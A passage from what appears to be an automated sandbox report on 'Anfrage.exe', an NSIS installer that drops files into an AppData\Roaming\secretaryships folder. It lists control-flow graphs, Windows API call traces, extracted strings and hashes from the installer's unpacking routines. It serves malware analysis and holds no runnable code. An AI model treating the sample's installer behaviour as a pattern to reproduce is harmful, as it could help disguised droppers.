316->298 318->316 320->321 324 403dbb-403dbc 321->324 325 403dbe 321->325 326 403dc0-403dee GetSystemMenu EnableMenuItem SendMessageA 324->326 325->326 327 403df0-403e01 SendMessageA 326->327 328 403e03 326->328 329 403e09-403e42 call 403fdd call 405dc3 lstrlenA call 405de5 SetWindowTextA call 401389 327->329 328->329 329->272 338 403e48-403e4a 329->338 338->272 339 403e50-403e54 338->339 340 403e73-403e87 DestroyWindow 339->340 341 403e56-403e5c 339->341 340->273 342 403e8d-403eba CreateDialogParamA 340->342 341->271 343 403e62-403e68 341->343 342->273 344 403ec0-403f17 call 403fa8 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 342->344 343->272 345 403e6e 343->345 344->271 350 403f19-403f31 ShowWindow call 403ff4 344->350 345->271 350->273
                                                                          APIs
                                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403B11
                                                                          • ShowWindow.USER32(?), ref: 00403B2E
                                                                          • DestroyWindow.USER32 ref: 00403B42
                                                                          • SetWindowLongA.USER32(?,00000000,00000000), ref: 00403B5E
                                                                          • GetDlgItem.USER32(?,?), ref: 00403B7F
                                                                          • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403B93
                                                                          • IsWindowEnabled.USER32(00000000), ref: 00403B9A
                                                                          • GetDlgItem.USER32(?,00000001), ref: 00403C48
                                                                          • GetDlgItem.USER32(?,00000002), ref: 00403C52
                                                                          • SetClassLongA.USER32(?,000000F2,?), ref: 00403C6C
                                                                          • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403CBD
                                                                          • GetDlgItem.USER32(?,00000003), ref: 00403D63
                                                                          • ShowWindow.USER32(00000000,?), ref: 00403D84
                                                                          • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403D96
                                                                          • EnableWindow.USER32(?,?), ref: 00403DB1
                                                                          • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403DC7
                                                                          • EnableMenuItem.USER32(00000000), ref: 00403DCE
                                                                          • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403DE6
                                                                          • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403DF9
                                                                          • lstrlenA.KERNEL32(0042A868,?,0042A868,Hves Setup), ref: 00403E22
                                                                          • SetWindowTextA.USER32(?,0042A868), ref: 00403E31
                                                                          • ShowWindow.USER32(?,0000000A), ref: 00403F65
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2121544761.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2121520366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121563651.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121695499.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                          • String ID: Hves Setup
                                                                          • API String ID: 3282139019-2374466059
                                                                          • Opcode ID: da448d94bc17f5267805ab40a90d87622891c5bcd4f6a4fe796976a1d19e5176
                                                                          • Instruction ID: dc7e82238fa4606f4707b849198a3fa7e113026ae2232510f5cb024fb41842d5
                                                                          • Opcode Fuzzy Hash: da448d94bc17f5267805ab40a90d87622891c5bcd4f6a4fe796976a1d19e5176
                                                                          • Instruction Fuzzy Hash: 89C1AF71604605ABDB206F22EE45E2B3EBCEB4570AF40053EF642B11F1CB79A942DB1D
                                                                          Function 00403743 Relevance: 45.7, APIs: 13, Strings: 13, Instructions: 215stringregistryCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 353 403743-40375b call 40615c 356 40375d-40376d call 405d21 353->356 357 40376f-4037a0 call 405caa 353->357 366 4037c3-4037ec call 403a08 call 405923 356->366 362 4037a2-4037b3 call 405caa 357->362 363 4037b8-4037be lstrcatA 357->363 362->363 363->366 371 4037f2-4037f7 366->371 372 403873-40387b call 405923 366->372 371->372 374 4037f9-403811 call 405caa 371->374 378 403889-4038ae LoadImageA 372->378 379 40387d-403884 call 405de5 372->379 377 403816-40381d 374->377 377->372 380 40381f-403821 377->380 382 4038b0-4038e0 RegisterClassA 378->382 383 40392f-403937 call 40140b 378->383 379->378 384 403832-40383e lstrlenA 380->384 385 403823-403830 call 405860 380->385 386 4038e6-40392a SystemParametersInfoA CreateWindowExA 382->386 387 4039fe 382->387 396 403941-40394c call 403a08 383->396 397 403939-40393c 383->397 391 403840-40384e lstrcmpiA 384->391 392 403866-40386e call 405835 call 405dc3 384->392 385->384 386->383 390 403a00-403a07 387->390 391->392 395 403850-40385a GetFileAttributesA 391->395 392->372 399 403860-403861 call 40587c 395->399 400 40385c-40385e 395->400 406 403952-40396c ShowWindow call 4060ee 396->406 407 4039d5-4039dd call 4050ae 396->407 397->390 399->392 400->392 400->399 412 403978-40398a GetClassInfoA 406->412 413 40396e-403973 call 4060ee 406->413 414 4039f7-4039f9 call 40140b 407->414 415 4039df-4039e5 407->415 418 4039a2-4039c5 DialogBoxParamA call 40140b 412->418 419 40398c-40399c GetClassInfoA RegisterClassA 412->419 413->412 414->387 415->397 420 4039eb-4039f2 call 40140b 415->420 424 4039ca-4039d3 call 403693 418->424 419->418 420->397 424->390
                                                                          APIs
                                                                            • Part of subcall function 0040615C: GetModuleHandleA.KERNEL32(?,?,?,0040320D,00000009), ref: 0040616E
                                                                            • Part of subcall function 0040615C: GetProcAddress.KERNEL32(00000000,?), ref: 00406189
                                                                          • lstrcatA.KERNEL32(1033,0042A868,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A868,00000000,00000002,75573410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Anfrage.exe",00000000), ref: 004037BE
                                                                          • lstrlenA.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\secretaryships,1033,0042A868,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A868,00000000,00000002,75573410), ref: 00403833
                                                                          • lstrcmpiA.KERNEL32(?,.exe), ref: 00403846
                                                                          • GetFileAttributesA.KERNEL32(Call), ref: 00403851
                                                                          • LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\secretaryships), ref: 0040389A
                                                                            • Part of subcall function 00405D21: wsprintfA.USER32 ref: 00405D2E
                                                                          • RegisterClassA.USER32(0042EBA0), ref: 004038D7
                                                                          • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 004038EF
                                                                          • CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403924
                                                                          • ShowWindow.USER32(00000005,00000000), ref: 0040395A
                                                                          • GetClassInfoA.USER32(00000000,RichEdit20A,0042EBA0), ref: 00403986
                                                                          • GetClassInfoA.USER32(00000000,RichEdit,0042EBA0), ref: 00403993
                                                                          • RegisterClassA.USER32(0042EBA0), ref: 0040399C
                                                                          • DialogBoxParamA.USER32(?,00000000,00403AD5,00000000), ref: 004039BB
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2121544761.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2121520366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121563651.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121695499.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                          • String ID: "C:\Users\user\Desktop\Anfrage.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\secretaryships$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                                          • API String ID: 1975747703-761011233
                                                                          • Opcode ID: a076f8ec2402cbae9f3fe9b816078eb7bdbed0063d8e43fd154ff60ee66dea9a
                                                                          • Instruction ID: b4fd17e6ad5735db6f0d6fe5a96b28392e8485eca6c7d92ade12033e63288973
                                                                          • Opcode Fuzzy Hash: a076f8ec2402cbae9f3fe9b816078eb7bdbed0063d8e43fd154ff60ee66dea9a
                                                                          • Instruction Fuzzy Hash: C261D8716446407ED720BF669D45F273EACDB54749F80447FF941B22E2CBBC99028A2D
                                                                          Function 00402CFA Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 182COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 427 402cfa-402d48 GetTickCount GetModuleFileNameA call 405a36 430 402d54-402d82 call 405dc3 call 40587c call 405dc3 GetFileSize 427->430 431 402d4a-402d4f 427->431 439 402d88 430->439 440 402e6f-402e7d call 402c96 430->440 432 402f2c-402f30 431->432 442 402d8d-402da4 439->442 446 402ed2-402ed7 440->446 447 402e7f-402e82 440->447 444 402da6 442->444 445 402da8-402db1 call 403145 442->445 444->445 454 402db7-402dbe 445->454 455 402ed9-402ee1 call 402c96 445->455 446->432 449 402e84-402e9c call 40315b call 403145 447->449 450 402ea6-402ed0 GlobalAlloc call 40315b call 402f33 447->450 449->446 478 402e9e-402ea4 449->478 450->446 476 402ee3-402ef4 450->476 456 402dc0-402dd4 call 4059f1 454->456 457 402e3a-402e3e 454->457 455->446 465 402e48-402e4e 456->465 474 402dd6-402ddd 456->474 464 402e40-402e47 call 402c96 457->464 457->465 464->465 467 402e50-402e5a call 4061d1 465->467 468 402e5d-402e67 465->468 467->468 468->442 475 402e6d 468->475 474->465 480 402ddf-402de6 474->480 475->440 481 402ef6 476->481 482 402efc-402f01 476->482 478->446 478->450 480->465 483 402de8-402def 480->483 481->482 484 402f02-402f08 482->484 483->465 485 402df1-402df8 483->485 484->484 486 402f0a-402f25 SetFilePointer call 4059f1 484->486 485->465 487 402dfa-402e1a 485->487 490 402f2a 486->490 487->446 489 402e20-402e24 487->489 491 402e26-402e2a 489->491 492 402e2c-402e34 489->492 490->432 491->475 491->492 492->465 493 402e36-402e38 492->493 493->465
                                                                          APIs
                                                                          • GetTickCount.KERNEL32 ref: 00402D0B
                                                                          • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\Anfrage.exe,00000400), ref: 00402D27
                                                                            • Part of subcall function 00405A36: GetFileAttributesA.KERNELBASE(00000003,00402D3A,C:\Users\user\Desktop\Anfrage.exe,80000000,00000003), ref: 00405A3A
                                                                            • Part of subcall function 00405A36: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405A5C
                                                                          • GetFileSize.KERNEL32(00000000,00000000,00437000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Anfrage.exe,C:\Users\user\Desktop\Anfrage.exe,80000000,00000003), ref: 00402D73
                                                                          Strings
                                                                          • C:\Users\user\Desktop, xrefs: 00402D55, 00402D5A, 00402D60
                                                                          • soft, xrefs: 00402DE8
                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00402D01
                                                                          • Inst, xrefs: 00402DDF
                                                                          • C:\Users\user\Desktop\Anfrage.exe, xrefs: 00402D11, 00402D20, 00402D34, 00402D54
                                                                          • Null, xrefs: 00402DF1
                                                                          • Error launching installer, xrefs: 00402D4A
                                                                          • "C:\Users\user\Desktop\Anfrage.exe", xrefs: 00402CFA
                                                                          • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402ED2
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2121544761.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2121520366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121563651.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121695499.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                          • String ID: "C:\Users\user\Desktop\Anfrage.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Anfrage.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                                                          • API String ID: 4283519449-574202934
                                                                          • Opcode ID: ff9acb172ce84b9ab5053db9bc38736bf02bbbb4910f3b2cd7bac771f2685801
                                                                          • Instruction ID: d5918a9216ca672954190790a9c5efd9bc82950644bb13a7859279fc2a8a748f
                                                                          • Opcode Fuzzy Hash: ff9acb172ce84b9ab5053db9bc38736bf02bbbb4910f3b2cd7bac771f2685801
                                                                          • Instruction Fuzzy Hash: 9F51EB71940215ABDB20AF64DE89B9F7BB8EB14355F50403BF900B72D1C7B88D858BAD
                                                                          Function 00401759 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 147stringtimeCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 625 401759-40177c call 402ace call 4058a2 630 401786-401798 call 405dc3 call 405835 lstrcatA 625->630 631 40177e-401784 call 405dc3 625->631 636 40179d-4017a3 call 40602e 630->636 631->636 641 4017a8-4017ac 636->641 642 4017ae-4017b8 call 4060c7 641->642 643 4017df-4017e2 641->643 650 4017ca-4017dc 642->650 651 4017ba-4017c8 CompareFileTime 642->651 645 4017e4-4017e5 call 405a11 643->645 646 4017ea-401806 call 405a36 643->646 645->646 653 401808-40180b 646->653 654 40187e-4018a7 call 404fdc call 402f33 646->654 650->643 651->650 655 401860-40186a call 404fdc 653->655 656 40180d-40184f call 405dc3 * 2 call 405de5 call 405dc3 call 4055b9 653->656 668 4018a9-4018ad 654->668 669 4018af-4018bb SetFileTime 654->669 666 401873-401879 655->666 656->641 689 401855-401856 656->689 670 402967 666->670 668->669 672 4018c1-4018cc CloseHandle 668->672 669->672 673 402969-40296d 670->673 675 4018d2-4018d5 672->675 676 40295e-402961 672->676 678 4018d7-4018e8 call 405de5 lstrcatA 675->678 679 4018ea-4018ed call 405de5 675->679 676->670 683 4018f2-4022e2 call 4055b9 678->683 679->683 683->673 689->666 691 401858-401859 689->691 691->655
                                                                          APIs
                                                                          • lstrcatA.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Roaming\secretaryships\Descendentalistic,00000000,00000000,00000031), ref: 00401798
                                                                          • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Roaming\secretaryships\Descendentalistic,00000000,00000000,00000031), ref: 004017C2
                                                                            • Part of subcall function 00405DC3: lstrcpynA.KERNEL32(?,?,00000400,00403251,Hves Setup,NSIS Error), ref: 00405DD0
                                                                            • Part of subcall function 00404FDC: lstrlenA.KERNEL32(0042A048,00000000,0041C020,755723A0,?,?,?,?,?,?,?,?,?,0040308E,00000000,?), ref: 00405015
                                                                            • Part of subcall function 00404FDC: lstrlenA.KERNEL32(0040308E,0042A048,00000000,0041C020,755723A0,?,?,?,?,?,?,?,?,?,0040308E,00000000), ref: 00405025
                                                                            • Part of subcall function 00404FDC: lstrcatA.KERNEL32(0042A048,0040308E,0040308E,0042A048,00000000,0041C020,755723A0), ref: 00405038
                                                                            • Part of subcall function 00404FDC: SetWindowTextA.USER32(0042A048,0042A048), ref: 0040504A
                                                                            • Part of subcall function 00404FDC: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405070
                                                                            • Part of subcall function 00404FDC: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040508A
                                                                            • Part of subcall function 00404FDC: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405098
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2121544761.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2121520366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121563651.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121695499.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                          • String ID: C:\Users\user\AppData\Local\Temp\nskF5B7.tmp$C:\Users\user\AppData\Local\Temp\nskF5B7.tmp\System.dll$C:\Users\user\AppData\Roaming\secretaryships\Descendentalistic$Call
                                                                          • API String ID: 1941528284-3215872003
                                                                          • Opcode ID: dbd51bdbfd1ce860f4c1c765c855f49dbf4a1797cd8297ab6e253aaa72fcfa08
                                                                          • Instruction ID: 615a3562c55b05fa993605831867e42c155a1137a6b97b034e6d1829953e469f
                                                                          • Opcode Fuzzy Hash: dbd51bdbfd1ce860f4c1c765c855f49dbf4a1797cd8297ab6e253aaa72fcfa08
                                                                          • Instruction Fuzzy Hash: E541D572910515BBCF107BB5DC49EAF3679EF05368F20823BF121B20E1D67C8A518A6D
                                                                          Function 00402F33 Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 166COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 692 402f33-402f47 693 402f50-402f59 692->693 694 402f49 692->694 695 402f62-402f67 693->695 696 402f5b 693->696 694->693 697 402f77-402f84 call 403145 695->697 698 402f69-402f72 call 40315b 695->698 696->695 702 403133 697->702 703 402f8a-402f8e 697->703 698->697 704 403135-403136 702->704 705 402f94-402fdd GetTickCount 703->705 706 4030de-4030e0 703->706 709 40313e-403142 704->709 710 402fe3-402feb 705->710 711 40313b 705->711 707 403120-403123 706->707 708 4030e2-4030e5 706->708 712 403125 707->712 713 403128-403131 call 403145 707->713 708->711 714 4030e7 708->714 715 402ff0-402ffe call 403145 710->715 716 402fed 710->716 711->709 712->713 713->702 726 403138 713->726 719 4030ea-4030f0 714->719 715->702 725 403004-40300d 715->725 716->715 722 4030f2 719->722 723 4030f4-403102 call 403145 719->723 722->723 723->702 729 403104-403110 call 405add 723->729 728 403013-403033 call 40623f 725->728 726->711 734 4030d6-4030d8 728->734 735 403039-40304c GetTickCount 728->735 736 403112-40311c 729->736 737 4030da-4030dc 729->737 734->704 738 403091-403093 735->738 739 40304e-403056 735->739 736->719 740 40311e 736->740 737->704 743 403095-403099 738->743 744 4030ca-4030ce 738->744 741 403058-40305c 739->741 742 40305e-40308e MulDiv wsprintfA call 404fdc 739->742 740->711 741->738 741->742 742->738 747 4030b0-4030bb 743->747 748 40309b-4030a2 call 405add 743->748 744->710 745 4030d4 744->745 745->711 750 4030be-4030c2 747->750 752 4030a7-4030a9 748->752 750->728 753 4030c8 750->753 752->737 754 4030ab-4030ae 752->754 753->711 754->750
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2121544761.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2121520366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121563651.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121695499.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: CountTick$wsprintf
                                                                          • String ID: TA$ TA$... %d%%$;mA
                                                                          • API String ID: 551687249-2794615820
                                                                          • Opcode ID: 205d5d13d599fec26c2c222d56ddb78c5c9a5f9a8d28ce79d18f424d9808a9fb
                                                                          • Instruction ID: 17fda0b725f1c36f5789cb51541ed76e7f3e8dd53de897cd261334f9a9fb1752
                                                                          • Opcode Fuzzy Hash: 205d5d13d599fec26c2c222d56ddb78c5c9a5f9a8d28ce79d18f424d9808a9fb
                                                                          • Instruction Fuzzy Hash: 4F519D71901219DBCB10DF65DA44B9E7BB8EF08366F10813BE810B72D0D7789A41CBAD
                                                                          Function 004054A2 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 755 4054a2-4054ed CreateDirectoryA 756 4054f3-405500 GetLastError 755->756 757 4054ef-4054f1 755->757 758 40551a-40551c 756->758 759 405502-405516 SetFileSecurityA 756->759 757->758 759->757 760 405518 GetLastError 759->760 760->758
                                                                          APIs
                                                                          • CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 004054E5
                                                                          • GetLastError.KERNEL32 ref: 004054F9
                                                                          • SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 0040550E
                                                                          • GetLastError.KERNEL32 ref: 00405518
                                                                          Strings
                                                                          • C:\Users\user\Desktop, xrefs: 004054A2
                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 004054C8
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2121544761.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2121520366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121563651.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121695499.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                          • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop
                                                                          • API String ID: 3449924974-1326413622
                                                                          • Opcode ID: 45a109fca96412ce29b98a5dc57c77bd9b21184e8ca6d4253022bd40daed81d6
                                                                          • Instruction ID: 8f3a1ad4c11c26192a8320527681c6b281dda8cd8d23604747c1fe251039353f
                                                                          • Opcode Fuzzy Hash: 45a109fca96412ce29b98a5dc57c77bd9b21184e8ca6d4253022bd40daed81d6
                                                                          • Instruction Fuzzy Hash: 2101E571D10619EADF119FA4CA047EFBFB8EB14355F00403AD945B6180D77896488FA9
                                                                          Function 004060EE Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 761 4060ee-40610e GetSystemDirectoryA 762 406110 761->762 763 406112-406114 761->763 762->763 764 406124-406126 763->764 765 406116-40611e 763->765 767 406127-406159 wsprintfA LoadLibraryExA 764->767 765->764 766 406120-406122 765->766 766->767
                                                                          APIs
                                                                          • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00406105
                                                                          • wsprintfA.USER32 ref: 0040613E
                                                                          • LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 00406152
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2121544761.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2121520366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121563651.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121695499.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                          • String ID: %s%s.dll$UXTHEME$\
                                                                          • API String ID: 2200240437-4240819195
                                                                          • Opcode ID: 22b859301be01545360faa7ed4cfae0610cf7599f3afabecce9a192d73219230
                                                                          • Instruction ID: f3b8c8f840e4a68c7bce26bfc9f978bd3a53690dd24d0c1e4954f7cf1b20607f
                                                                          • Opcode Fuzzy Hash: 22b859301be01545360faa7ed4cfae0610cf7599f3afabecce9a192d73219230
                                                                          • Instruction Fuzzy Hash: BEF0217054020AA7DB149B64DD0DFFB379CBB08305F14047AA587F50C2D5B8D5358B58
                                                                          Function 004023D3 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73registrystringCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
